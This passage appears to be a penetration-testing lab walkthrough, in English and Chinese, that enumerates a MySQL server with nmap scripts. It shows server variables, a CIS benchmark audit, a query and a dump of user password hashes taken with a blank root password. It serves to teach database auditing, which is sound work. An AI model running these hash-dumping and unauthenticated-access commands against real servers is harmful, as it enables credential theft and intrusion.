| have_ndbcluster: NO
| have_openssl: DISABLED
| have_partitioning: YES
| have_profiling: YES
| have_query_cache: YES
| have_rtree_keys: YES
| have_ssl: DISABLED
| have_symlink: YES
| hostname: victim-1
| identity: 0
| ignore_builtin_innodb: OFF
| init_connect:
| init_file:
| init_slave:
| innodb_adaptive_flushing: ON
| innodb_adaptive_hash_index: ON
| innodb_additional_mem_pool_size: 8388608
| innodb_autoextend_increment: 8
| innodb_autoinc_lock_mode: 1
| innodb_buffer_pool_instances: 1
| innodb_buffer_pool_size: 134217728
| innodb_change_buffering: all
| innodb_checksums: ON
| innodb_commit_concurrency: 0
| innodb_concurrency_tickets: 500
| innodb_data_file_path: ibdata1:10M:autoextend
| innodb_data_home_dir:
| innodb_doublewrite: ON
| innodb_fast_shutdown: 1
| innodb_file_format: Antelope
| innodb_file_format_check: ON
| innodb_file_format_max: Antelope
| innodb_file_per_table: OFF
| innodb_flush_log_at_trx_commit: 1
| innodb_flush_method:
| innodb_force_load_corrupted: OFF
| innodb_force_recovery: 0
| innodb_io_capacity: 200
| innodb_large_prefix: OFF
| innodb_lock_wait_timeout: 50
| innodb_locks_unsafe_for_binlog: OFF
| innodb_log_buffer_size: 8388608
| innodb_log_file_size: 5242880
| innodb_log_files_in_group: 2
| innodb_log_group_home_dir: ./
| innodb_max_dirty_pages_pct: 75
| innodb_max_purge_lag: 0
| innodb_mirrored_log_groups: 1
| innodb_old_blocks_pct: 37
| innodb_old_blocks_time: 0
| innodb_open_files: 300
| innodb_print_all_deadlocks: OFF
| innodb_purge_batch_size: 20
| innodb_purge_threads: 0
| innodb_random_read_ahead: OFF
| innodb_read_ahead_threshold: 56
| innodb_read_io_threads: 4
| innodb_replication_delay: 0
| innodb_rollback_on_timeout: OFF
| innodb_rollback_segments: 128
| innodb_spin_wait_delay: 6
| innodb_stats_method: nulls_equal
| innodb_stats_on_metadata: ON
| innodb_stats_sample_pages: 8
| innodb_strict_mode: OFF
| innodb_support_xa: ON
| innodb_sync_spin_loops: 30
| innodb_table_locks: ON
| innodb_thread_concurrency: 0
| innodb_thread_sleep_delay: 10000
| innodb_use_native_aio: ON
| innodb_use_sys_malloc: ON
| innodb_version: 5.5.62
| innodb_write_io_threads: 4
| insert_id: 0
| interactive_timeout: 28800
| join_buffer_size: 131072
| keep_files_on_create: OFF
| key_buffer_size: 16777216
| key_cache_age_threshold: 300
| key_cache_block_size: 1024
| key_cache_division_limit: 100
| large_files_support: ON
| large_page_size: 0
| large_pages: OFF
| last_insert_id: 0
| lc_messages: en_US
| lc_messages_dir: /usr/share/mysql/
| lc_time_names: en_US
| license: GPL
| local_infile: ON
| lock_wait_timeout: 31536000
| locked_in_memory: OFF
| log: OFF
| log_bin: OFF
| log_bin_trust_function_creators: OFF
| log_error: /var/log/mysql/error.log
| log_output: FILE
| log_queries_not_using_indexes: OFF
| log_slave_updates: OFF
| log_slow_queries: OFF
| log_warnings: 1
| long_query_time: 10.000000
| low_priority_updates: OFF
| lower_case_file_system: OFF
| lower_case_table_names: 0
| max_allowed_packet: 16777216
| max_binlog_cache_size: 18446744073709547520
| max_binlog_size: 104857600
| max_binlog_stmt_cache_size: 18446744073709547520
| max_connect_errors: 10
| max_connections: 151
| max_delayed_threads: 20
| max_error_count: 64
| max_heap_table_size: 16777216
| max_insert_delayed_threads: 20
| max_join_size: 18446744073709551615
| max_length_for_sort_data: 1024
| max_long_data_size: 16777216
| max_prepared_stmt_count: 16382
| max_relay_log_size: 0
| max_seeks_for_key: 18446744073709551615
| max_sort_length: 1024
| max_sp_recursion_depth: 0
| max_tmp_tables: 32
| max_user_connections: 0
| max_write_lock_count: 18446744073709551615
| metadata_locks_cache_size: 1024
| min_examined_row_limit: 0
| multi_range_count: 256
| myisam_data_pointer_size: 6
| myisam_max_sort_file_size: 9223372036853727232
| myisam_mmap_size: 18446744073709551615
| myisam_recover_options: BACKUP
| myisam_repair_threads: 1
| myisam_sort_buffer_size: 8388608
| myisam_stats_method: nulls_unequal
| myisam_use_mmap: OFF
| net_buffer_length: 16384
| net_read_timeout: 30
| net_retry_count: 10
| net_write_timeout: 60
| new: OFF
| old: OFF
| old_alter_table: OFF
| old_passwords: OFF
| open_files_limit: 1048576
| optimizer_prune_level: 1
| optimizer_search_depth: 62
| optimizer_switch: index_merge=on,index_merge_union=on,index_merge_sort_union=on,index_merge_intersection=on,engine_condition_pushdown=on
| performance_schema: OFF
| performance_schema_events_waits_history_long_size: 10000
| performance_schema_events_waits_history_size: 10
| performance_schema_max_cond_classes: 80
| performance_schema_max_cond_instances: 1000
| performance_schema_max_file_classes: 50
| performance_schema_max_file_handles: 32768
| performance_schema_max_file_instances: 10000
| performance_schema_max_mutex_classes: 200
| performance_schema_max_mutex_instances: 1000000
| performance_schema_max_rwlock_classes: 30
| performance_schema_max_rwlock_instances: 1000000
| performance_schema_max_table_handles: 100000
| performance_schema_max_table_instances: 50000
| performance_schema_max_thread_classes: 50
| performance_schema_max_thread_instances: 1000
| pid_file: /var/run/mysqld/mysqld.pid
| plugin_dir: /usr/lib/mysql/plugin/
| port: 3306
| preload_buffer_size: 32768
| profiling: OFF
| profiling_history_size: 15
| protocol_version: 10
| proxy_user:
| pseudo_slave_mode: OFF
| pseudo_thread_id: 60
| query_alloc_block_size: 8192
| query_cache_limit: 1048576
| query_cache_min_res_unit: 4096
| query_cache_size: 16777216
| query_cache_type: ON
| query_cache_wlock_invalidate: OFF
| query_prealloc_size: 8192
| rand_seed1: 0
| rand_seed2: 0
| range_alloc_block_size: 4096
| read_buffer_size: 131072
| read_only: OFF
| read_rnd_buffer_size: 262144
| relay_log:
| relay_log_index:
| relay_log_info_file: relay-log.info
| relay_log_purge: ON
| relay_log_recovery: OFF
| relay_log_space_limit: 0
| report_host:
| report_password:
| report_port: 3306
| report_user:
| rpl_recovery_rank: 0
| secure_auth: OFF
| secure_file_priv:
| server_id: 0
| skip_external_locking: ON
| skip_name_resolve: OFF
| skip_networking: OFF
| skip_show_database: OFF
| slave_compressed_protocol: OFF
| slave_exec_mode: STRICT
| slave_load_tmpdir: /tmp
| slave_max_allowed_packet: 1073741824
| slave_net_timeout: 3600
| slave_skip_errors: OFF
| slave_transaction_retries: 10
| slave_type_conversions:
| slow_launch_time: 2
| slow_query_log: OFF
| slow_query_log_file: /var/lib/mysql/victim-1-slow.log
| socket: /var/run/mysqld/mysqld.sock
| sort_buffer_size: 2097152
| sql_auto_is_null: OFF
| sql_big_selects: ON
| sql_big_tables: OFF
| sql_buffer_result: OFF
| sql_log_bin: ON
| sql_log_off: OFF
| sql_low_priority_updates: OFF
| sql_max_join_size: 18446744073709551615
| sql_mode:
| sql_notes: ON
| sql_quote_show_create: ON
| sql_safe_updates: OFF
| sql_select_limit: 18446744073709551615
| sql_slave_skip_counter: 0
| sql_warnings: OFF
| ssl_ca:
| ssl_capath:
| ssl_cert:
| ssl_cipher:
| ssl_key:
| storage_engine: InnoDB
| stored_program_cache: 256
| sync_binlog: 0
| sync_frm: ON
| sync_master_info: 0
| sync_relay_log: 0
| sync_relay_log_info: 0
| system_time_zone: UTC
| table_definition_cache: 400
| table_open_cache: 400
| thread_cache_size: 8
| thread_concurrency: 10
| thread_handling: one-thread-per-connection
| thread_stack: 196608
| time_format: %H:%i:%s
| time_zone: SYSTEM
| timed_mutexes: OFF
| timestamp: 1661484676
| tmp_table_size: 16777216
| tmpdir: /tmp
| transaction_alloc_block_size: 8192
| transaction_prealloc_size: 4096
| tx_isolation: REPEATABLE-READ
| unique_checks: ON
| updatable_views_with_limit: YES
| version: 5.5.62-0ubuntu0.14.04.1
| version_comment: (Ubuntu)
| version_compile_machine: x86_64
| version_compile_os: debian-linux-gnu
| wait_timeout: 28800
|_ warning_count: 0
MAC Address: 02:42:C0:29:3F:03 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.51 seconds
Check whether File Privileges can be granted to non admin users using mysql_audi nmap script.
No.
根据 CIS MySQL v1.0.2 基准测试的部分内容审核 MySQL 数据库服务器安全配置(该引擎可通过创建适当的审核文件用于其他 MySQL 审核)。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
root@attackdefense:~# nmap -p 3306 --script mysql-audit --script-args "mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'" 192.41.63.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-26 03:38 UTC
Nmap scan report for target-1 (192.41.63.3)
Host is up (0.000043s latency).
PORT STATE SERVICE
3306/tcp open mysql
| mysql-audit:
| CIS MySQL Benchmarks v1.0.2
| 3.1: Skip symbolic links => FAIL
| 3.2: Logs not on system partition => PASS
| 3.2: Logs not on database partition => PASS
| 4.1: Supported version of MySQL => REVIEW
| Version: 5.5.62-0ubuntu0.14.04.1
| 4.4: Remove test database => PASS
| 4.5: Change admin account name => PASS
| 4.7: Verify Secure Password Hashes => PASS
| 4.9: Wildcards in user hostname => PASS
| The following users were found with wildcards in hostname
| filetest
| root
| 4.10: No blank passwords => PASS
| The following users were found having blank/empty passwords
| root
| 4.11: Anonymous account => PASS
| 5.1: Access to mysql database => REVIEW
| Verify the following users that have access to the MySQL database
| user host
| 5.2: Do not grant FILE privileges to non Admin users => PASS
| The following users were found having the FILE privilege
| filetest
| 5.3: Do not grant PROCESS privileges to non Admin users => PASS
| 5.4: Do not grant SUPER privileges to non Admin users => PASS
| 5.5: Do not grant SHUTDOWN privileges to non Admin users => PASS
| 5.6: Do not grant CREATE USER privileges to non Admin users => PASS
| 5.7: Do not grant RELOAD privileges to non Admin users => PASS
| 5.8: Do not grant GRANT privileges to non Admin users => PASS
| 6.2: Disable Load data local => FAIL
| 6.3: Disable old password hashing => FAIL
| 6.4: Safe show database => FAIL
| 6.5: Secure auth => FAIL
| 6.6: Grant tables => FAIL
| 6.7: Skip merge => FAIL
| 6.8: Skip networking => FAIL
| 6.9: Safe user create => FAIL
| 6.10: Skip symbolic links => FAIL
|
| Additional information
| The audit was performed using the db-account: root
|_ The following admin accounts were excluded from the audit: root,debian-sys-maint
MAC Address: 02:42:C0:29:3F:03 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds
Dump all user hashes using nmap script.
从 MySQL 服务器转储密码哈希,格式适合被 John the Ripper 等工具破解。需要适当的数据库权限(root)。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root@attackdefense:~# nmap -p 3306 192.41.63.3 --script mysql-dump-hashes --script-args="username='root',password=''"
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-26 03:45 UTC
Nmap scan report for target-1 (192.41.63.3)
Host is up (0.000049s latency).
PORT STATE SERVICE
3306/tcp open mysql
| mysql-dump-hashes:
| debian-sys-maint:*CDDA79A15EF590ED57BB5933ECD27364809EE90D
| filetest:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
| ultra:*827EC562775DC9CE458689D36687DCED320F34B0
| guest:*17FD2DDCC01E0E66405FB1BA16F033188D18F646
| sigver:*027ADC92DD1A83351C64ABCD8BD4BA16EEDA0AB0
| udadmin:*E6DEAD2645D88071D28F004A209691AC60A72AC9
|_ sysadmin:*46CFC7938B60837F46B610A2D10C248874555C14
MAC Address: 02:42:C0:29:3F:03 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.36 seconds
Find the number of records stored in table “authors” in database “books” stored on MySQL Server using mysql-query nmap script.
对 MySQL 数据库运行查询并将结果作为表返回。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
root@attackdefense:~# nmap -p 3306 192.41.63.3 --script mysql-query --script-args="query='select count(*) from books.authors;',username='root',password=''"
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-26 03:50 UTC
Nmap scan report for target-1 (192.41.63.3)
Host is up (0.000039s latency).
PORT STATE SERVICE
3306/tcp open mysql
| mysql-query:
| count(*)
| 10
|
| Query: select count(*) from books.authors;
|_ User: root
MAC Address: 02:42:C0:29:3F:03 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds
解决方案
此实验室的解决方案可在以下手册中找到:https://assets.ine.com/labs/ad-manuals/walkthrough-529.pdf
Metasploit Module: MySQL Password Hashdump
MYSQL File/Directory Enumerator
Nmap Script: mysql-empty-password
Nmap Script: mysql-dump-hashes